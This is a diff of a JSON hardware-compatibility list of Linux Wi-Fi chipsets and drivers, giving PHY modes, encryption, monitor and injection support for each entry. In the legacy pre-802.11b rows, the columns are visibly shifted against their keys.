"rt2800usb", - "PHY Modes": "(a)b/g/(n)", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "y (??)", - "Monitor": "y", - "Inj.": "y", - "Bus": "USB 2.0", - "Notes": "Wiki" - }, - { - "Manufacturer": "Ralink", - "Chipset": "RT2770, RT2870, RT2070, RT307x", - "Driver": "rt2870sta", - "PHY Modes": "(a)/b/g/(n)", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "USB 2.0", - "Notes": "vendor driver" - }, - { - "Manufacturer": "Ralink", - "Chipset": "RT3572", - "Driver": "rt3572sta", - "PHY Modes": "a/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "n", - "Inj.": "n", - "Bus": "USB 2.0", - "Notes": "" - }, - { - "Manufacturer": "Ralink", - "Chipset": "RT3573", - "Driver": "none", - "PHY Modes": "a/b/g/n", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "USB 2.0", - "Notes": "three stream" - }, - { - "Manufacturer": "Realtek", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8180L, RTL8185L,\nRTL8187SE (3.15+)", - "Driver": "rtl8180", - "PHY Modes": "b/(g)", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "n", - "AP": "n", - "Mesh": "n", - "Monitor": "y", - "Inj.": "?", - "Bus": "PCI/CB", - "Notes": "" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8187L, RTL8187B", - "Driver": "rtl8187", - "PHY Modes": "b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "n", - "AP": "n", - "Mesh": "n", - "Monitor": "y", - "Inj.": "y", - "Bus": "USB 2.0", - "Notes": "" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8187SE", - "Driver": "rtl8187se", - "PHY Modes": "b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "PCI", - "Notes": "" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8190", - "Driver": "r8190_pci", - "PHY Modes": "b/g/n", - "Encrypt.": "?", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "PCI\n/ CB", - "Notes": "vendor driver" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8192E", - "Driver": "r8192e_pci", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "PCIe", - "Notes": "staging (vendor) driver" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8191SE, RTL8192SE", - "Driver": "rtl8192se", - "PHY Modes": "b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "PCIe", - "Notes": "" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8192U", - "Driver": "r8192u_usb", - "PHY Modes": "b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "USB 2.0", - "Notes": "staging (vendor) driver" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8188SU, RTL8191SU, RTL8192SU", - "Driver": "r8712u", - "PHY Modes": "b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "n", - "Bus": "USB 2.0", - "Notes": "staging (vendor) driver" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8188SU, RTL8191SU, RTL8192SU", - "Driver": "r8192s_usb", - "PHY Modes": "b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "y", - "Inj.": "?", - "Bus": "USB 2.0", - "Notes": "staging (vendor) driver, superseded by r8712u" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8188CE, RTL8192CE", - "Driver": "rtl8192ce", - "PHY Modes": "b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "n", - "Bus": "PCIe", - "Notes": "" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8188CUS, RTL8192CU, RTL8188RU", - "Driver": "rtl8192cu", - "PHY Modes": "b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "?", - "Monitor": "y", - "Inj.": "n", - "Bus": "USB 2.0", - "Notes": "" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8192DU", - "Driver": "rtl8192du", - "PHY Modes": "a/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "USB 2.0", - "Notes": "driver available here, may panic on init on some kernels" - }, - { - "Manufacturer": "Realtek", - "Chipset": "RTL8192DE", - "Driver": "rtl8192de", - "PHY Modes": "a/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "n", - "Bus": "PCIe", - "Notes": "" - }, - { - "Manufacturer": "Renesas", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Renesas", - "Chipset": "KS7010", - "Driver": "ks7010", - "PHY Modes": "b", - "Encrypt.": "?", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "SDIO", - "Notes": "from Javi Roman" - }, - { - "Manufacturer": "ShareWave / Cirrus Logic", - "Chipset": "Bodega", - "Driver": "none", - "PHY Modes": "b", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI/ PCMCIA/ USB 1.0", - "Notes": "rare devices, support the proprietary Whitecap protocol" - }, - { - "Manufacturer": "SiS", - "Chipset": "160", - "Driver": "sis160", - "PHY Modes": "b", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "?", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "PCI", - "Notes": "rare devices, driver is a useless binary blob" - }, - { - "Manufacturer": "SiS", - "Chipset": "162, 162U", - "Driver": "sis162", - "PHY Modes": "b", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "PCI/ USB 2.0", - "Notes": "driver is a useless binary blob" - }, - { - "Manufacturer": "SiS", - "Chipset": "163, 163U", - "Driver": "none", - "PHY Modes": "b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI/CF/ USB 2.0", - "Notes": "" - }, - { - "Manufacturer": "ST-Ericsson", - "Chipset": "CW1100, CW1200", - "Driver": "cw1200", - "PHY Modes": "b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "SDIO\n/ PCI", - "Notes": "(since 3.11)" - }, - { - "Manufacturer": "ST-NXP", - "Chipset": "STLC4560", - "Driver": "p54spi", - "PHY Modes": "b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "y", - "Monitor": "y", - "Inj.": "y", - "Bus": "SPI", - "Notes": "" - }, - { - "Manufacturer": "Symbol", - "Chipset": "Spectrum24 DS", - "Driver": "orinoco", - "PHY Modes": "b", - "Encrypt.": "WEP", - "Station": "y", - "Ad-hoc": "?", - "AP": "n", - "Mesh": "n", - "Monitor": "y", - "Inj.": "n", - "Bus": "PCI/ PCMCIA", - "Notes": "orinoco" - }, - { - "Manufacturer": "Syntek/3DSP", - "Chipset": "unknown\n(Bluew-2310x)", - "Driver": "none", - "PHY Modes": "b/g", - "Encrypt.": "?", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI", - "Notes": "compiled modules available" - }, - { - "Manufacturer": "Syntek/3DSP", - "Chipset": "STK9100+STK9230\n(Bluew-2310u)", - "Driver": "3dspusbwlan", - "PHY Modes": "b/g", - "Encrypt.": "?", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "USB 2.0", - "Notes": "partial source?" - }, - { - "Manufacturer": "Texas Instruments", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Texas Instruments", - "Chipset": "ACX100 (TNETW1100), ACX101 (TNETW1100B), ACX111 (TNETW1130), TNETW1450", - "Driver": "acx1xx", - "PHY Modes": "b/(g)", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "n", - "Mesh": "n", - "Monitor": "y", - "Inj.": "?", - "Bus": "PCI/CB /USB", - "Notes": "acx100\nacx" - }, - { - "Manufacturer": "Texas Instruments", - "Chipset": "WL1251", - "Driver": "wl1251", - "PHY Modes": "b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "?", - "Monitor": "y", - "Inj.": "?", - "Bus": "SPI/ SDIO", - "Notes": "" - }, - { - "Manufacturer": "Texas Instruments", - "Chipset": "WL1271", - "Driver": "wl1271", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "SPI/ SDIO", - "Notes": "" - }, - { - "Manufacturer": "VIA", - "Chipset": "VT6551", - "Driver": "none", - "PHY Modes": "b", - "Encrypt.": "?", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "PCI", - "Notes": "" - }, - { - "Manufacturer": "VIA", - "Chipset": "VT6555", - "Driver": "vt6655", - "PHY Modes": "(a)/b/g", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "n", - "Bus": "PCI", - "Notes": "staging (vendor) driver\nvt6656" - }, - { - "Manufacturer": "VIA", - "Chipset": "VT6556", - "Driver": "vt6656", - "PHY Modes": "(a)/b/g", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "n", - "Bus": "PCI", - "Notes": "staging (vendor) driver\nvt6656" - }, - { - "Manufacturer": "WavePlus", - "Chipset": "WP1200", - "Driver": "none", - "PHY Modes": "b", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI/ PCMCIA", - "Notes": "devices not common" - }, - { - "Manufacturer": "Winbond", - "Chipset": "W89C33D", - "Driver": "none", - "PHY Modes": "b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI", - "Notes": "devices not common" - }, - { - "Manufacturer": "Winbond", - "Chipset": "W89C35D", - "Driver": "winbond", - "PHY Modes": "b/g", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "?", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "USB 2.0", - "Notes": "staging (vendor) driver only supports 'b'\nw35und" - }, - { - "Manufacturer": "ZyDAS", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "ZyDAS", - "Chipset": "ZD1201", - "Driver": "zd1201", - "PHY Modes": "b", - "Encrypt.": "WEP", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "y", - "Inj.": "?", - "Bus": "USB 1.0", - "Notes": "zd1201" - }, - { - "Manufacturer": "ZyDAS", - "Chipset": "ZD1201", - "Driver": "zdsta", - "PHY Modes": "b", - "Encrypt.": "WEP", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "n", - "Bus": "USB 1.0", - "Notes": "obsolete vendor driver" - }, - { - "Manufacturer": "ZyDAS", - "Chipset": "ZD1201", - "Driver": "zdsta", - "PHY Modes": "b", - "Encrypt.": "WEP", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "n", - "Bus": "PCMCIA", - "Notes": "obsolete vendor driver, devices not common" - }, - { - "Manufacturer": "ZyDAS", - "Chipset": "ZD1202", - "Driver": "zdsta", - "PHY Modes": "b", - "Encrypt.": "WEP", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "n", - "Bus": "PCI/CB/ PCMCIA", - "Notes": "obsolete vendor driver, devices not common" - }, - { - "Manufacturer": "ZyDAS", - "Chipset": "ZD1211/ZD1211B", - "Driver": "zd1211rw", - "PHY Modes": "(a)/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "y", - "Monitor": "y", - "Inj.": "y", - "Bus": "USB 1.0", - "Notes": "5GHz band not supported, no hw crypto\nzd1211rw" - }, - { - "Manufacturer": "ZyDAS", - "Chipset": "ZD1212/ZD1212B", - "Driver": "zd1212", - "PHY Modes": "(a)/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "", - "Monitor": "", - "Inj.": "n", - "Bus": "PCI/CB", - "Notes": "obsolete vendor driver, devices not common" - }, - { - "Manufacturer": "Manufacturer", - "Chipset": "Chipset", - "Driver": "Driver", - "PHY Modes": "PHY Modes", - "Encrypt.": "Station", - "Station": "Ad-hoc", - "Ad-hoc": "AP", - "AP": "Monitor", - "Mesh": "Bus", - "Monitor": "Notes", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Aironet", - "Chipset": "ARLAN", - "Driver": "arlan", - "PHY Modes": "pre-b (900MHz or 2.4GHz)", - "Encrypt.": "?", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "ISA", - "Monitor": "driver abandoned", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Lucent", - "Chipset": "WaveLAN", - "Driver": "wavelan", - "PHY Modes": "pre-b (900MHz or 2.4GHz)", - "Encrypt.": "?", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "PCMCIA/ISA", - "Monitor": "driver abandoned", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Raytheon", - "Chipset": "Raylink", - "Driver": "ray_cs", - "PHY Modes": "2.4GHz FHSS", - "Encrypt.": "?", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "PCMCIA", - "Monitor": "USB variants not supported", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "ShareWave", - "Chipset": "chipset before\nBodega (Epic?)", - "Driver": "none", - "PHY Modes": "Whitecap", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "PCI/PCMCIA", - "Monitor": "uncommon devices", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Symbol", - "Chipset": "Spectrum24 FHSS", - "Driver": "none", - "PHY Modes": "2.4GHz FHSS", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "PCMCIA", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Xircom", - "Chipset": "Netwave", - "Driver": "netwave_cs", - "PHY Modes": "pre-b, 1Mb", - "Encrypt.": "?", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "PCMCIA", - "Monitor": "driver abandoned", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "AMD", - "Chipset": "Am79C930\n(presumably)", - "Driver": "wl3501_cs", - "PHY Modes": "2Mb, pre-802.11b", - "Encrypt.": "?", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "PCMCIA", - "Monitor": "PRISM I based RF", - "Inj.": "", - "Bus": "", - "Notes": "" - } +[ + { + "Manufacturer": "ADMtek", + "Chipset": "ADM8211, ADM8211B", + "Driver": "adm8211", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCI/CB", + "Notes": "currently broken AFAIK\nadm8211" + }, + { + "Manufacturer": "Agere", + "Chipset": "HERMES II (WL60010)", + "Driver": "wlags49_h2", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCI/ PCMCIA", + "Notes": "staging (vendor) driver\nwlags49_h2" + }, + { + "Manufacturer": "Agere", + "Chipset": "HERMES II.5 (WL60040)", + "Driver": "wlags49_h25", + "PHY Modes": "(a)/b/g", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCI/ PCMCIA", + "Notes": "staging (vendor) driver, not all devices supported\nwlags49_h25" + }, + { + "Manufacturer": "Airgo", + "Chipset": "AGN100/AGN300 pre-N", + "Driver": "agnx", + "PHY Modes": "(a)b/g", + "Encrypt.": "", + "Station": "n", + "Ad-hoc": "n", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCI/CB", + "Notes": "driver never completed, abandoned\nagnx" + }, + { + "Manufacturer": "Airgo", + "Chipset": "AGN300 pre-N USB", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "devices not common" + }, + { + "Manufacturer": "Aironet /\nCisco", + "Chipset": "4500, 4800,\nCisco 340/350", + "Driver": "airo", + "PHY Modes": "b", + "Encrypt.": "WEP, WPA-TKIP", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "n", + "Monitor": "y", + "Inj.": "n", + "Bus": "ISA/PCI /PCMCIA", + "Notes": "airo" + }, + { + "Manufacturer": "ALi", + "Chipset": "M4301A", + "Driver": "none", + "PHY Modes": "b", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CB", + "Notes": "devices not common (mainly WUSB11 v4)" + }, + { + "Manufacturer": "AMD", + "Chipset": "Alchemy AM1772", + "Driver": "none", + "PHY Modes": "b", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CB", + "Notes": "see this abomination" + }, + { + "Manufacturer": "Atheros", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR5000", + "Driver": "ath5k", + "PHY Modes": "a", + "Encrypt.": "", + "Station": "b", + "Ad-hoc": "b", + "AP": "b", + "Mesh": "b", + "Monitor": "y", + "Inj.": "b", + "Bus": "PCI/CB", + "Notes": "tx support currently broken\nath5k" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR5001A-AR5007EG", + "Driver": "ath5k", + "PHY Modes": "(a)/b/(g)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/PCIe /CB", + "Notes": "ath5k" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR5000-AR5007EG", + "Driver": "madwifi", + "PHY Modes": "(a)/b/(g)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "?", + "Monitor": "y", + "Inj.": "?", + "Bus": "PCI/PCIe /CB", + "Notes": "superseded by ath5k" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR5513\n(Data Falcon)", + "Driver": "none", + "PHY Modes": "(a)/b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CB", + "Notes": "somewhat relevant" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR5005U (AR5523)", + "Driver": "ar5523", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "n", + "Ad-hoc": "n", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "driver never completed, 5GHz mode non-functional?\nar5523" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR5005U (AR5523)", + "Driver": "athusbwlan", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "obsolete vendor driver" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR9001U \n(AR9170)", + "Driver": "carl9170", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "carl9170" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR600x", + "Driver": "ar6k", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "SDIO", + "Notes": "" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR6003", + "Driver": "ath6kl", + "PHY Modes": "a/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "?", + "Bus": "SDIO", + "Notes": "driver currently in staging\n0271:0402\nath6kl" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR9374", + "Driver": "ath6kl", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "0cf3:9375\nath6kl" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR2427+AR5008\n+AR900x", + "Driver": "ath9k", + "PHY Modes": "(a)/b/g/(n)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/PCIe /CB", + "Notes": "fcs check broken in monitor mode since ~2.6.33\nath9k" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR9002U \n(AR9271, AR7010)", + "Driver": "ath9k_htc", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "0411:0197\nath9k_htc" + }, + { + "Manufacturer": "Qualcomm Atheros", + "Chipset": "QCA6164, QCA6174,\nQCA9880 v2, QCA9882 v2\nQCA9890 v2, QCA9892 v2", + "Driver": "ath10k", + "PHY Modes": "a/b/g/n (+ac)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCIe", + "Notes": "+3.11 (4.3)\n168c:003e\n168c:0041\nath10k" + }, + { + "Manufacturer": "Qualcomm Atheros", + "Chipset": "Wilocity Wil6210\n802.11ad 60GHz", + "Driver": "wil6210", + "PHY Modes": "a/b/g/n (+ac+ad)", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCIe", + "Notes": "wil6210" + }, + { + "Manufacturer": "Qualcomm", + "Chipset": "WFB400", + "Driver": "none", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/ PCIe/ CB/ USB 2.0", + "Notes": "unknown if released,\nAirgo AGN400" + }, + { + "Manufacturer": "Atmel", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Atmel", + "Chipset": "AT76C502A", + "Driver": "atmel", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "?", + "Inj.": "n", + "Bus": "PCMCIA", + "Notes": "atmel cs" + }, + { + "Manufacturer": "Atmel", + "Chipset": "AT76C503A, AT76C505(A)", + "Driver": "at76c50x-usb", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "n", + "AP": "n", + "Mesh": "n", + "Monitor": "beacons", + "Inj.": "n", + "Bus": "USB 1.0", + "Notes": "at76c50x-usb" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4301, BCM4307, BCM4306r2", + "Driver": "b43legacy", + "PHY Modes": "b/(g)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/CB/ PCMCIA", + "Notes": "ssb\nb43legacy" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4306r3, BCM4311, BCM4312, BCM4309, BCM4318(E), BCM4321, BCM4322", + "Driver": "b43", + "PHY Modes": "(a)/b/g/(n)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/PCIe /CB", + "Notes": "ssb, no HT mode support\nb43" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM43224, BCM43225, BCM4331", + "Driver": "b43", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCIe", + "Notes": "bcma, no HT mode support, no current 5GHz support\nb43" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4311, BCM4313, BCM4321, BCM4322, BCM4322x, BCM43225, BCM43227, BCM43228", + "Driver": "wl", + "PHY Modes": "(a)/b/g/(n)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCIe", + "Notes": "vendor driver\nwl" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4320 and other\nrndis variants", + "Driver": "rndis_wlan", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "rndis wlan" + }, + { + 